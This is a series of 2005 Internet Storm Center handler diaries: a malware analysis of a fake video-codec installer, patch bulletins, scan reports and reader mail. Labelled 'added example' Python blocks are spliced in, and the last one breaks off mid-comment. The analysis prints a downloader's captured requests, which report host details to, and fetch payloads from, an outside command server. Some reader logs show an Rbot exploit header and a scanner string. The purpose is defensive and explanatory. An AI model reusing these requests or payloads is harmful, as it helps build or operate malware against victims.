The interesting thing about vc3_05b.exe is the little show that it gives us along the way, in order to make us think that everything is legitimate and above board. Joe saw it all: a confirmation "This will install Vcodec ver 3.15. Do you wish to continue?" dialog box, and an official looking EULA signoff. The funny thing is, it all doesn’t amount to a hill of beans.



It doesn’t matter how you answer any of their questions, your system is getting whacked while you’re watching the show.



If you say you don’t want to install their software, they install their software.



If you tell them to shove their EULA where the sun don’t shine, you’re still getting msmsgs.exe installed.



Heck, if you cancel the install, it even warns you: "Setup is not complete. If you quit the setup program now, the program will not be installed. Are you sure?" And then it installs msmsgs.exe anyway.



Lovely. Pond-scum with a sense of humor.



So, what is msmsgs.exe? Is it a video codec?



Sure it is...



...and I’m the Pope.



Setting aside (for now) the possibility of a Thomas the First papacy, it turns out that msmsgs.exe is actually just a nasty little downloader Trojan. It injects itself into Windows Explorer and then contacts the site "fhgstr.com":



GET /ping.php HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



If the fhgstr.com site replies with the ever-popular phrase:



0b723718-9389-4ca8-86f4-632a4bbc88a4



msmsgs.exe switches into "blabbermouth" mode and spills its guts:



GET /info.php?land=1033&uuid=7c75xb3b-955d-42ad-9xdf-17da5x645c0e&id=192.168.74.128&osl=English%20(United%20States) HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



telling the folks back home several interesting facts about its host. Not to be outdone in the blathering-gibberish department, fhgstr.com comes bouncing back (pun intended) with a rousing chorus of:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so

|HP7081700.so|P7091300.so|S7081700.so

0



To the untrained eye, that might just look like gobbledygook, and indeed, that’s pretty much what it looked like to me. However, with a little bit of prodding, and tossing it the correct types of messages in the lab, msmsgs.exe knew *exactly* what to do, and proceeded to try to grab nine files with requests like the following:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache



(Note: Just in case you’ve not figured it out yet, working through what these little critters do is a somewhat painstaking combination of disassembly, debugging, and behavioral analysis under lab conditions. This isn’t something that you should ever try, unless you really know what you’re doing. If you mess up, you can end up infecting non-laboratory machines… not that *I* would ever do that, mind you, but I... uh... umm... know of people who have.)
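The "gobbledygook" reply is less mysterious than it looks: the framing of a hex "6e" line, the data, and a trailing "0" is consistent with HTTP/1.1 chunked transfer encoding (0x6e is 110, which is the length of the nine pipe-separated names plus a line terminator), so the body is simply a list of nine files for msmsgs.exe to fetch one by one with the downloadex.php requests shown above. The following is an added example, not code from the diary or from the malware, that decodes that reply and turns the captured requests into a matcher a proxy-log reviewer can run. The reply bytes are a constructed re-framing of the text in the diary (the exact line terminator is an assumption), and the host, paths and User-Agent strings are the ones the diary captured.

```python
import re

# Constructed re-framing of the fhgstr.com reply quoted in the diary, as a
# raw chunked HTTP body: "<hex length>\r\n<data>\r\n" ... "0\r\n\r\n".
C2_BODY = (
    b"6e\r\n"
    b"M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so"
    b"|HP7081700.so|P7091300.so|S7081700.so\n"
    b"\r\n"
    b"0\r\n\r\n"
)

# Indicators taken from the requests captured in the diary.
C2_HOST = "fhgstr.com"
C2_PATH_RE = re.compile(r"^/(ping|info|downloadex)\.php(\?|$)")
KNOWN_USER_AGENTS = {
    "blia, nu i v sad",
    "029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038",
}


def decode_chunked(body):
    """Minimal chunked-body decoder: reads '<hex size>\\r\\n<size bytes>\\r\\n'
    until a zero-size chunk. Chunk extensions after ';' are ignored; trailers
    are not supported (the C2 reply uses neither)."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0].strip(), 16)
        pos = nl + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates this chunk


def parse_file_list(decoded):
    """The decoded payload is a '|'-separated list of file names."""
    return [name for name in decoded.decode("ascii").strip().split("|") if name]


def expected_downloads(names, land=1033):
    """Request paths the downloader would issue next, in the form the diary
    shows (useful as a watch-list for proxy or IDS logs)."""
    return [f"/downloadex.php?file={name}&land={land}" for name in names]


def flag_request(host, path, user_agent):
    """Return the reasons an outbound request matches the captured C2 traffic.
    A path-only match is weak on its own (ping.php is a common name); the
    host and the odd User-Agent strings are the strong signals."""
    reasons = []
    if host.lower() == C2_HOST:
        reasons.append("host")
    if user_agent in KNOWN_USER_AGENTS:
        reasons.append("user-agent")
    if C2_PATH_RE.match(path):
        reasons.append("path")
    return reasons


if __name__ == "__main__":
    names = parse_file_list(decode_chunked(C2_BODY))
    print(len(names), "files:", names)
    for p in expected_downloads(names):
        print("  expect", p)
    print(flag_request("fhgstr.com", "/ping.php", "blia, nu i v sad"))
```

Nine names come out of the decoder, matching the nine download attempts the diary observed, and the first generated path is the exact "GET /downloadex.php?file=M7081700.so&land=1033" request quoted above. The User-Agent strings are the cheapest thing to alert on here, since nothing legitimate sends them.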



So, what presents are waiting for us when msmsgs.exe gets done with its downloads? You’ll have to wait until next week, when I’m on duty again for the next FTBM...



Here’s a hint though: at the tail end of VCodec’s EULA, there is this little gem:



"ADDENDUM: By accepting this agreement you also accept installing of free software helping you surf the web easily and get useful information in single click"



Setting aside for a moment the fact that their entire EULA looks like a really bad cut-n-paste job, why oh why can’t these people put together a decent sentence?



Another butt-covering bite o’ EULA:



"In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to SOFTREV by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your computer



Updates to Software.



The Software includes an automatic update feature to ensure that you have the most recently released version. You acknowledge and agree that SOFTREV or third parties designated by SOFTREV may from time to time provide automatic programming fixes, updates and upgrades to the Software (collectively, the Updates). Updates may include installation of third party applications, through automatic electronic dissemination and other means. You consent to such Updates and agree that the terms and conditions of this Agreement will apply to all such Updates. If you should elect not to have your software updated at any future time, SOFTREV shall not be responsible for any incompatibilities that may arise on your system and Computer."



Finally, I may not be able to write the next installment, because it appears that I might have, perhaps, somehow, inadvertently, without forethought or malice, accidentally, in some way (probably while under the influence of caffeine – so it’s not really my fault) violated VCodec’s EULA... especially the part that says I’m not allowed to reverse engineer their "product."



Oops... sorry ‘bout that.



Hmmm... I’ll make them a deal: when they actually have a product, I won’t reverse engineer it.


-----------------------------------------------------------------

Handler on Duty: Tom Liston (tom at intelguardians dot com)
http://www.intelguardians.com


Published: 2005-07-12

Microsoft patches are out; Port 80 spike; Mail bag; Firefox 1.0.5 released; Oracle and Apple too!

Happy Patch Day!



Microsoft has rated all three updates as critical.


Font Parsing Vulnerability in Word - Vulnerability CAN-2005-0564


http://www.microsoft.com/technet/security/Bulletin/MS05-035.mspx



Description:
A stack buffer overflow in the font-parsing code that is
part of Microsoft Word.

Links:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0564
http://support.microsoft.com/kb/903672

Affected software:

- Office 2000 and Office XP (2002)

- Microsoft Works 2000, 2001, 2002, 2003 and 2004


Impact:

- Arbitrary code execution with the rights of the logged-in user.

- Exploitable via email attachments (user interaction needed),
which gives it worm potential.

Work arounds:

- Do not open Word attachments.

- Stop attachments at the perimeter.

Fix:
- Install MS05-035 (which updates MS05-023)

Best practice:

To prevent future problems of this kind with a layered approach, it is
suggested to:

- Use minimal rights (not administrator) when logging in on any
Windows machine.

- Teach all users never to open unexpected attachments, no matter how
tempting the surrounding message is.

- Filter Office attachments coming from the Internet at the perimeter,
and keep them in quarantine until it is determined they are really
needed and safe.

- Not use Microsoft Word as the editor for email messages.

- Consider using less widely used software as a way not to get
caught in mass exploits. This will not work well
against directed attacks.



Microsoft Security Bulletin MS05-036 -- Vulnerability in Microsoft Color
Management Module Could Allow Remote Code Execution (901214) CAN-2005-1219



http://www.microsoft.com/technet/security/Bulletin/MS05-036.mspx




Affected: Win2K, XPSP1, XPSP2, Server 2003 and Server 2003SP1
(Critical); Win98, 98SE, and ME (Important).

A flaw in validating the format tags within an image once again requires
Windows be patched. Like MS04-028 (JPEGS) and MS05-009 (PNGS), MS05-036
patches a flaw in the way that an image format is parsed which could cause an
exploitable buffer overflow. This time, the affected component is the
Microsoft Color Management Module, which is used by Windows to provide
consistent color mappings between different devices and applications and
to transform colors from one color space to another (for example, RGB to
CMYK).

Images which contain bogus ICC (International Color Consortium -- which
actually sounds like a bunch of interior decorators that meet down at
their local Starbuck's) profile format tags can cause the Color
Management Module to overflow a buffer in a way that could result in
execution of code, giving full control to an attacker.

Malicious images could be hosted on a website or sent as attachments to
email messages. It appears that HTML-email messages containing
malicious images could also be a vector.

Win2K, XP, and 2003 Server require patching. There are currently no
workarounds listed.

Win98, 98SE, and ME, while still vulnerable to the buffer overflow, do
not currently appear to be exploitable.

Note: According to MS, this vulnerability is *CURRENTLY* being exploited.
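An added example, not Microsoft's fix and not Windows code: a Python parser that validates an ICC profile's tag table (128-byte header, 4-byte tag count, 12-byte entries, per the ICC specification) before trusting any offset or size in it, exercised with constructed profiles carrying the kind of bogus tag values described above.

```python
"""Added example: validate an ICC profile's tag table before trusting any offset in it."""
import struct
from typing import List, Tuple

HEADER_LEN = 128  # the ICC header is a fixed 128 bytes; the tag count follows it
ENTRY_LEN = 12    # each tag entry: 4-byte signature, 4-byte offset, 4-byte size (big-endian)


class ProfileError(ValueError):
    """Raised when the tag table does not fit inside the profile buffer."""


def parse_tag_table(profile: bytes) -> List[Tuple[str, int, int]]:
    """Return (signature, offset, size) per tag, rejecting any that points outside the buffer."""
    total = len(profile)
    if total < HEADER_LEN + 4:
        raise ProfileError("too short for a header and tag count")
    declared = struct.unpack(">I", profile[:4])[0]
    if declared != total:
        raise ProfileError(f"header claims {declared} bytes, buffer holds {total}")
    (count,) = struct.unpack(">I", profile[HEADER_LEN:HEADER_LEN + 4])
    # Python ints do not wrap; in C this multiplication must itself be overflow-checked.
    table_end = HEADER_LEN + 4 + count * ENTRY_LEN
    if table_end > total:
        raise ProfileError(f"tag count {count} needs {table_end} bytes, buffer holds {total}")
    tags = []
    for i in range(count):
        base = HEADER_LEN + 4 + i * ENTRY_LEN
        sig, offset, size = struct.unpack(">4sII", profile[base:base + ENTRY_LEN])
        # Check offset and size separately as well as against each other: in C the sum
        # offset + size can wrap to a small value and pass a single "<= total" test.
        if offset < table_end or offset > total or size > total - offset:
            raise ProfileError(f"tag {sig!r}: [{offset}, {offset + size}) lies outside the data area")
        tags.append((sig.decode("latin-1"), offset, size))
    return tags


def is_well_formed(profile: bytes) -> bool:
    """True when every tag lies inside the buffer, False for anything parse_tag_table rejects."""
    try:
        parse_tag_table(profile)
        return True
    except ProfileError:
        return False


def build_profile(tags: List[Tuple[bytes, bytes]]) -> bytes:
    """Assemble a minimal, consistent profile (constructed test input, not a real colour profile)."""
    table_end = HEADER_LEN + 4 + ENTRY_LEN * len(tags)
    entries, data, cursor = b"", b"", table_end
    for sig, payload in tags:
        entries += struct.pack(">4sII", sig, cursor, len(payload))
        data += payload
        cursor += len(payload)
    header = struct.pack(">I", cursor) + b"\x00" * (HEADER_LEN - 4)
    return header + struct.pack(">I", len(tags)) + entries + data


def tamper_tag_size(profile: bytes, index: int, new_size: int) -> bytes:
    """Copy of `profile` whose tag `index` claims `new_size` bytes (header left consistent)."""
    buf = bytearray(profile)
    struct.pack_into(">I", buf, HEADER_LEN + 4 + index * ENTRY_LEN + 8, new_size)
    return bytes(buf)


def tamper_tag_count(profile: bytes, new_count: int) -> bytes:
    """Copy of `profile` whose tag count is `new_count`, with no matching entries behind it."""
    buf = bytearray(profile)
    struct.pack_into(">I", buf, HEADER_LEN, new_count)
    return bytes(buf)


GOOD = build_profile([(b"desc", b"sample description"), (b"wtpt", b"\x00" * 12)])

if __name__ == "__main__":
    print(parse_tag_table(GOOD))
    print(is_well_formed(tamper_tag_size(GOOD, 1, 0xFFFFFFF0)))  # size that would wrap in uint32 math
    print(is_well_formed(tamper_tag_count(GOOD, 1_000_000)))     # count far beyond the buffer
```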




MS05-037 (KB903235) - Vulnerability in JView Profiler Could Allow
Remote Code Execution




http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx




JView Profiler Vulnerability (CAN-200502987) - A newly-discovered,
public vulnerability in the JView Profiler (javaprxy.dll) which can
be instantiated in Internet Explorer contains a remote code execution
vulnerability. Microsoft reports that this COM object was not
designed to be accessed through Internet Explorer. As such this fix
will set the kill bit for the JView Profiler COM object.

This vulnerability affects Windows 98, Windows 98 SE, Windows
Millennium Edition, XP, 2000, and 2003. However, the Microsoft Java
Virtual Machine, where the JView Profiler originates, is not included
by default with Windows XP SP1a and SP2, or Windows Server 2003
and Windows Server 2003 SP1 systems.

As Microsoft has received reports of this vulnerability being
exploited, the Internet Storm Center recommends that this fix be
applied quickly.

Affected software:

Windows 2000 SP4, Windows XP SP1 and 2, Windows Server 2003 and SP1,
Windows 98 and SE, Windows ME.

JView Profiler, Internet Explorer 5.01 SP4, Internet Explorer 6 and SP1,
Internet Explorer 5.5 SP2.





MS05-033 was also updated today.


http://www.microsoft.com/technet/security/Bulletin/MS05-033.mspx




The Microsoft Malicious Software Removal Tool has been updated
as well.




http://go.microsoft.com/fwlink/?LinkId=40587




Port 80 spike



http://www.dshield.org/port_report.php?port=80

Dshield is showing the beginning of what looks like a large spike in
probes to port 80. The cause is unknown at this time, but could be attributable
to any number of new vulnerabilities being exploited, a new skiddie toy, or
new worm variants.




Mail bag


Paul Jarvis wrote in to warn of probes to his web server.
"I've noticed over the last few days a number of access attempts to
/cacti/graph_image.php on my servers from a variety of addresses - most
of which track back to other webservers. I checked Packetstorm and there
were a number of exploits released this/last month for Cacti using that php file."

Another reader wrote in to warn of continued Rbot activity he had noticed.
"So far, we're up to 300 of these and climbing, coming from all over, Denmark,
Vietnam, Germany, Spain, etc..

GET / HTTP/1.0

Host: YourWebServerIP

Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCEGqhghBmI4
IQYgOCBAEAQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF

Gonna be a fun day!"

George Bakos noted this activity in his diary of June 3rd:
http://isc.sans.org/diary.php?date=2005-06-03

Mozilla Firefox 1.0.5 released.


The list of security fixes does not appear to have been updated yet.

"Firefox 1.0.5 is a security update that is part of our ongoing program to provide a safe Internet experience for our customers. We recommend that all users upgrade to this latest version."

http://www.mozilla.org/products/firefox/releases/1.0.5.html

[We finally found a listing of what this release fixes:

MFSA 2005-56 Code execution through shared function objects

MFSA 2005-55 XHTML node spoofing

MFSA 2005-54 Javascript prompt origin spoofing

MFSA 2005-53 Standalone applications can run arbitrary code through the browser

MFSA 2005-52 Same origin violation: frame calling top.focus()

MFSA 2005-51 The return of frame-injection spoofing

MFSA 2005-50 Possibly exploitable crash in InstallVersion.compareTo()

MFSA 2005-49 Script injection from Firefox sidebar panel using data:

MFSA 2005-48 Same-origin violation with InstallTrigger callback

MFSA 2005-47 Code execution via "Set as Wallpaper"

MFSA 2005-46 XBL scripts ran even when Javascript disabled

MFSA 2005-45 Content-generated event vulnerabilities

...thanks Scott! -TL]

Oracle patches



Oracle has released a collection of patches that address security
vulnerabilities.

http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html

Apple patches



Mac OS X Update 10.4.2 has been released.
"The 10.4.2 Update delivers overall improved reliability and compatibility for Mac OS X v10.4 and is recommended for all users."

http://docs.info.apple.com/article.html?artnum=301722

Thanks team!


Additional help on this diary from Scott, Tom, Erik, Swa, Kevin,

and the rest of the amazing Handler team. Thanks also to our readers and
contributors.

Today gives new meaning to Black Patch Tuesday!!






Cheers,

Adrien de Beaupré,

Handler of the day.

http://www.cinnabar.ca



Published: 2005-07-11

The MS Claria debate; Intrusions via MS05-017; some more light reading


Microsoft anti-spyware and the Claria debate



There's been some recent talk about Microsoft spyware classification methods and its objectivity in doing so. We received some inquiries about the Claria classification and decided to look into a bit further.


(For some background, check out the Techweb article on the subject:
http://www.techweb.com/wire/security/165701020 )


In looking a bit deeper, it appears Microsoft made a formal response to the allegations late last week. In its response (posted in a letter available
here ) Microsoft states:


"Upon review of their software against our criteria, we determined that continued detection of Claria's products was indeed appropriate. We also decided that adjustments should be made to the classification of Claria software in order to be fair and consistent with how Windows AntiSpyware (Beta) handles similar software from other vendors."


We also found the following policy doc to be a good starting point on Microsoft's anti-spyware policy and process:

"Windows AntiSpyware (Beta): Analysis approach and categories"

http://www.microsoft.com/athome/security/spyware/software/isv/analysis.mspx


I think it's important that folks keep an eye on these types of issues as the entire adware/spyware problem continues to evolve, but it appears that this particular round of actions were "above board."



Intrusions via MS05-017



We received a comment about MS05-017 (Message Queuing vulnerability) based attacks being successfully executed, and some questions concerning where/what installs the service in the first place. According to MS it is not installed by default with OS installations, so this might be another one of those services (like the MSDE / Visio problems of years past) that has a "stealth-install" side to it. In short, keep an eye out for this guy running on your systems...



Some light reading

Amit Klein released an article on Cross Site Scripting which attacks a user's client without sending malicious content to the web server:
http://www.webappsec.org/projects/articles/071105.shtml


Fellow handler Scott forwarded an interesting Instant Messenger (IM) threat tracking site:
http://imlogic.com/im_threat_center/index.asp



Happy Monday,

-Greg


Published: 2005-07-10

zlib Security Vulnerability; Protecting Your Privacy


Greetings everyone, I hope you are enjoying this wonderful weekend that has been remarkably quiet. This is overall a good thing as my birthday was over the weekend and it was one of those zero ending ones that appear to be so traumatic to most. Happily, I was able to enjoy this special day with some wonderful friends and even found time to do some desperately needed cleaning of my study/computer room (of which has been called the junk room by friends in recent past). Even so, there are a couple of things that are noteworthy.
zlib Security Vulnerability

It was noted today on the zlib website (and at other locations over the past 2-3 days) that a new security vulnerability has been discovered. It appears that with a specially crafted input file, applications using zlib version 1.2.1 and 1.2.2 can crash due to memory being overwritten. A new version of zlib is due out soon. Keep an eye on the zlib website at http://www.zlib.net/ for more information about the new release and how best to protect your systems from this localized form of Denial of Service.
Protecting Your Privacy

Today, while doing some of the aforementioned house cleaning, I came across the big daunting stack of newspapers that I have been meaning to go through and clip items out of (like wedding announcements, funny comics, or recipes to add to my collection, usually). While thumbing through one of the more recent ones, I came across an article by a local reporter about protecting your privacy on the computer.

Some of the things in this article are good, some not as much. But one of the key points I gained from this article is that the less technologically competent people out there do not think the same way the rest of us do. So communicating with them is always going to be a challenge. (I am going to see if I can find a link for the article online at some point... but it may not happen today.)

In the article, the author discussed some simple steps to prevent the family computer from exposing personal secrets by a little bit of knowledge. Below is the list of steps mentioned.

1) Separate User Accounts -- By having separate user accounts, it is the author's belief that one can segment your sensitive activities in one account, and then switch accounts for general use. Personally I think this is naive to think end users would actually use separate accounts as any type of security measure.

2) Delete Internet History -- I do this regularly, though I am not sure if it is out of paranoia or to just free up disk space on my hard drive. As trained individuals can potentially recover bits of your internet history, I am far from naive enough to think that this action will actually do much more than clear out some of the tracking cookies on your system (if you have it delete files in the cache as well as the history), and/or keep less computer-literate people from snooping as easily.

3) Delete Recent Items -- This refers to the shortcuts left behind in Windows (My Recent Documents) and OS X (Recent Items). For the same reasons in #2, I do not believe this really does much to improve your privacy.

4) Encrypt Sensitive Files -- This is the only really useful tip given in the article. The article encourages the use of the freeware version of PGP and even notes that once a file is encrypted, one cannot easily restore the file without the given password or passphrase.

Thinking through this list, it amazes me how far we still need to go to educate the general public (and those working in the mass media) about the best steps one can take, as a lowly computer user, to protect your computer. It is going to be a long, long battle to be able to relate some of the complex computer privacy issues to those that need to know them most.

So, I really think we can do better. I think that it is going to be up to those of us with security knowledge to find better ways to communicate things like choosing strong passwords, updating your anti-virus and operating system routinely, and being wary of phishing emails and similar tactics. If you have some ideas, I plan to drop a note to the local reporter (and post through our handlers diary in the near future) that we can use to educate end users.


Published: 2005-07-09

Request for Help, OOB Chat Room Keeps London Working During Attack

Good morning!


Request for Help



This morning the Handlers received a note from Ian Tomkinson that he had detected the following in their web server access logs. It caught his attention because of the "ISC.SANS.DFind" string--probably an attempt to make the traffic look legitimate.



xxx.xxx.xxx.xxx - - [08/Jul/2005:18:51:35 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:)
HTTP/1.1" 400 320 "-" "-"


This hit was followed up by a scan for phpMyAdmin, using a tool called "PMAFind".


Please review your web server logs for anything with this string in it. Should you find a hit, please submit a copy of the log excerpt to http://isc.sans.org/contact.php

Update: see http://isc.sans.org/diary.php?storyid=900

Thanks!

Internet Chat Room Keeps London Trading Alive During Attack



This story caught my attention yesterday, while reading some of the coverage of the bombing attacks in London. The details themselves are simplified a bit, but the gist of it is this: many financial (and I'm sure other) institutions were able to continue operating during the crisis last week through the use of what I'd call out-of-band communications mechanisms, including websites and chat rooms, set up as a response to the terror attacks of 9/11. It also talks about the improved contingency planning that has occurred because of the same.

One of the true stories behind these terrible events is certainly how well infrastructure bits have held up.

Food for thought: do you have any out-of-band mechanisms in case some of your major systems fail? Even something as simple as a published e-mail address not hosted on your own systems may be useful. Perhaps a Jabber server, or an IRC chat room somewhere?

http://www.alertnet.org/thenews/newsdesk/L08557431.htm
-------------------------




Dave Brookshire

SANS ISC Handler-on-Duty


Published: 2005-07-08

London bombing trojan, update on system monitoring attempts, Updates from Microsoft coming

We have a collection of updates for you today: 3 fixes coming from Microsoft, use of the Veritas flaws, and more harrowing tales of my attempt to keep track of what my system does.




Microsoft updates coming


Microsoft has stated that they will be publishing three security patches on July 12th. Two for Microsoft Windows and one for Microsoft Office. At least one of the Windows updates is a Critical priority and the Office update is Critical as well.




MitM tool released for MS RDP vuln


There is now a tool that can exploit the Microsoft RDP man-in-the-middle vulnerability from early June. There is no patch available for this, though SP1 for Windows 2003 should fix it. You do actually have to be able to be in the middle of the connection to make the tool work.




Compromises being reported from Veritas flaw


We have gotten a number of reports of systems being compromised via the Veritas remote agent vulnerability. If you are one of those who haven't yet patched your systems, you might want to get around to it.




US-CERT warns of targeted trojan email attempts


US-CERT has published a that they have seen an increase in the use of email as a method of spreading trojans. This is something that has been discussed for a while now and appears to be a duplicate of the warning that was sent out via other national CERTs but it is still a good read.




Email virus claiming to be news of London bombing


It seems that someone with no sense of decency has started spreading a virus via email. Consider yourselves warned. :(




More adventures in System monitoring


Last time I was on duty, I posted a rant about my frustrations with monitoring the state of my system and having confidence that I knew everything that was executing and what it was doing. In response I got a number of excellent suggestions and pointers to tools to try.


Since then I've tried a number of different products and am quite pleased to announce that although I still don't have as much visibility (and more importantly, clarity) into what my system is doing as I would like, I have managed to make background tasks take up enough system resources to cause a system with a 1.6GHz processor and a GB of RAM to crawl. And interestingly enough, it seems that battery life when in _standby_ mode drops dramatically as well.


I mentioned a couple of the tools I was going to try in my rant. Since then I've given up on all of them. Xintegrity had a nice interface but kept taking 6 hours to do a complete system analysis and then crashing near the end of the job. So much for that. Osiris is an excellent tool and had a good baseline for Windows XP, but it really didn't give me the sort of information I was looking for.


The two primary tools that I've found and am using consistently are All Seeing Eye and ProcessGuard. I've started using the NoScript Extension for Firefox and really love it, though the "allow scripts temporarily" feature seems buggy, as it keeps causing Firefox to crash.


All Seeing Eye is a general system monitoring tool, it watches processes, the system startup, DLLs, log files, BHOs, ActiveX, the registry... it does tons of stuff. Unfortunately, it doesn't give a lot of information about what any changes may mean which leaves you in the position of trying to figure out how you should feel about the things it is telling you. It also eats at least 5% of your processor and because of the disk monitoring, it eats battery life in a laptop as well. I like it a lot but I don't let it run all the time, especially when not plugged in to the wall.


ProcessGuard is focused on watching the actual processes running on your system directly. This is nice as it warns you any time anything starts and also tells you how it was started and what started it (which is pretty interesting to watch). It doesn't seem to have much impact on the system except to maybe slow it a little (but not enough to notice by itself for most things). The interface is pretty good too. Overall I think it is a good addition.


Did I find what I wanted? Nope! I wanna see all the things being routed through svchost.exe and System processes, and none of these tools made me feel _really_ good about the potential for DLL insertion and other nasty things (though ASE and ProcessGuard are helping some)



If you have more suggestions, let me know. I'll try things out and report back.

Published: 2005-07-07

London, .us TLD, ...


Late Update

London Bombings



Our sympathies to all those affected by this morning's bombings in London, UK.
On behalf of the SANS ISC, we're saddened by this terrible tragedy, and feel
for your loss.

.us TLD DNS resolvability issues



We're monitoring some spotty DNS resolvability problems from a handful of
ISPs for sites in the .us zone--everything from some sites working to an entire
loss of .us visibility. The cause seems to be a confluence of internet
latency issues coupled with DNS caches storing the lack of data as
actual data, although we don't currently have an "official answer".


Published: 2005-07-06

Consensus gathering on log analysis and correlation in enterprise environment

Today, we solicited ideas regarding log analysis and correlation in an enterprise environment. Logs in a large environment can be overwhelming: gigabytes upon gigabytes of logs can be generated every hour by tens of thousands of devices in the environment. To get a clear picture of what's happening in the environment and to get an audit trail, we must analyze and store the logs properly. Any tips and tricks on log strategy our readers would like to share? Do you filter events before a centralized collection point? Do you attempt to collect as much as possible from all devices (e.g. IDS with full signature set) and then trim down the events later at your log analysis engine?

*** UPDATE ***



Claudiu Rusnac uses syslog-ng and liked its ability to sort based upon date, and also hostname. He also liked Arcsight for aggregation and correlation on all the win32, unix, firewall, router/switch, IDS logs.



Ronaldo C Vasconcellos reminded us of the great article written by Marcus Ranum as a great resource on filtering events. http://www.ranum.com/security/computer_security/papers/ai/



Chad liked Cisco MARS (formerly Protego) and agrees that it is good for network-based events but relatively weak on the host side.

Chris Reynolds developed a customized ASP/SQL solution for MS servers to parse log files and store them in a SQL database. It will also trigger an email alert on interesting events.



Jeff Bryner summarizes the logs in RSS feeds and then uses an RSS-capable browser (such as Firefox) to view them as news stories.




Published: 2005-07-05

Quiet Day;TCP/443; Firefox GIF image handling heap overflow exploit; MS javaprxy.dll update

Quiet Day



It has been a slow day and everybody in the US enjoyed their Independence Day. I didn't see any sign of widespread exploits of the phpBB, Java or Veritas vulnerabilities. Actually, one of our readers reported a new phpBB incident, but he only submitted the one script which defaced the web site, and notified Zone-H. Judging from the script, a Brazilian defacer group created it. Still no sign of a new phpBB worm. If you have any sign of a new phpBB worm or wild exploit, please share this information with us.

Some readers gave us ideas about the spam challenge protocol; we appreciate your submissions and will post a summary at a later date. I didn't take the honor of raising the Infocon; maybe the next handler, Jason, will take the honor.





TCP/443.



Today, we did see an increase of tcp/443 scanning. The reason is unknown, maybe a new bot, or even a new vulnerability? You can see the tcp/443 activity at the
. If you have any strange activity at tcp/443, please share it with us. We need any helpful packet, log and your feedback. You can submit through our



Update: Preliminary analysis shows that most of the 443 scanning traffic is spoofed (J.U.).



Firefox GIF image handling heap overflow exploit



The
released a new exploit for Firefox. The vulnerability is due to a heap overrun error when processing a specific extension block in GIF images, which may be exploited to run arbitrary code on a vulnerable system via a web page or email message containing a specially crafted GIF image. The affected versions are Firefox 1.0.1 and prior.




MS javaprxy.dll update



Microsoft updated their
(903144) on a COM Object (Javaprxy.dll) causing Internet Explorer to unexpectedly exit. The advisory update adds Microsoft Download Center information for the registry key update that disables Javaprxy.dll in Internet Explorer. But this is still a workaround; no official patch is available.








Kevin Hong


Handler on Duty.


khong-at-kisa.or.kr

Published: 2005-07-04

Happy Independence Day; Impending Storm; Spam Challenge Protocol Pros and Cons

It has been a quiet Independence Day holiday. It appears most of the mischief makers may be taking a break. Or are they?



Impending Storm



There has been some conversation today that we may have a storm on the horizon. It was suggested that tomorrow could be a bit lively with the announcement of PoCs affecting phpBB, Java exploits and the still lingering Veritas issue. It was suggested by one of our readers that we may want to raise the Alert level just as a wake-up call to our readers. It was decided after much discussion that we are not ready to raise it at this time. We do appreciate all of the feedback from our readers and the positive input that we received today.



It could be interesting to see what tomorrow will bring. And to see if Kevin will have the honor of raising the yellow flag.



Spam Challenge Protocol Pros and Cons



We received an email today asking for our input on the use of Challenge Protocol to validate an email sender and prevent spam. This particular email was from one of our regular contributors. He has been having a problem with an artificial "denial of service" attack today caused by the use of email addresses from his organization being spoofed.



From his initial email:
"We received tons of challenges to authenticate e-mails sent out (which
we didn't - forged sender addresses!) from a particular product."



I can understand the frustration that this reader is experiencing. I can see the pros and cons of this type of "validation" and I can see how this could be used to further compromise the reader's email system. I tell my customers to turn off the Auto-reply in their email systems to prevent their email address being used. I also recommend that they turn off the auto-notify in their anti-virus software programs, what with all of the email spoofing going on today.



So I ask you: what do you think of the use of a Challenge Protocol to authenticate emails?
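An added example, not the reader's product and not ISC code: a Python challenge/response gatekeeper that refuses to challenge bounces, auto-submitted mail and senders that fail SPF, and rate-limits challenges per sender domain, which is what would have kept the reader's forged addresses from being flooded; the per-domain threshold and the sample messages are constructed assumptions.

```python
"""Added example: a conservative challenge/response policy that will not flood a forged sender."""
from collections import Counter
from email import message_from_string
from typing import Tuple

# Assumed threshold (not from the page): past this many challenges to one domain, further
# "new senders" there are far more likely to be forged addresses than real correspondents.
MAX_CHALLENGES_PER_DOMAIN = 20


def should_challenge(raw_message: str, envelope_from: str, sent: Counter) -> Tuple[bool, str]:
    """Decide whether to send a challenge for one inbound message.

    raw_message   -- RFC 2822 text (headers + body)
    envelope_from -- SMTP MAIL FROM address ("" or "<>" for bounces)
    sent          -- running count of challenges already sent, keyed by sender domain
    Returns (challenge?, reason).
    """
    msg = message_from_string(raw_message)
    sender = envelope_from.strip().strip("<>")

    # 1. Never challenge a bounce: nobody can answer it, and replying to it loops.
    if not sender:
        return False, "null envelope sender: bounce or DSN, never challenge"

    # 2. Automatic mail (DSNs, vacation replies, other systems' challenges) must not be challenged.
    auto = (msg.get("Auto-Submitted") or "no").strip().lower()
    if auto != "no":
        return False, f"Auto-Submitted: {auto}: challenging it would start a reply loop"
    if (msg.get("Precedence") or "").strip().lower() in ("bulk", "junk", "list"):
        return False, "bulk/list precedence: no human to answer the challenge"

    # 3. A sender that failed SPF is probably forged; the challenge would land on the
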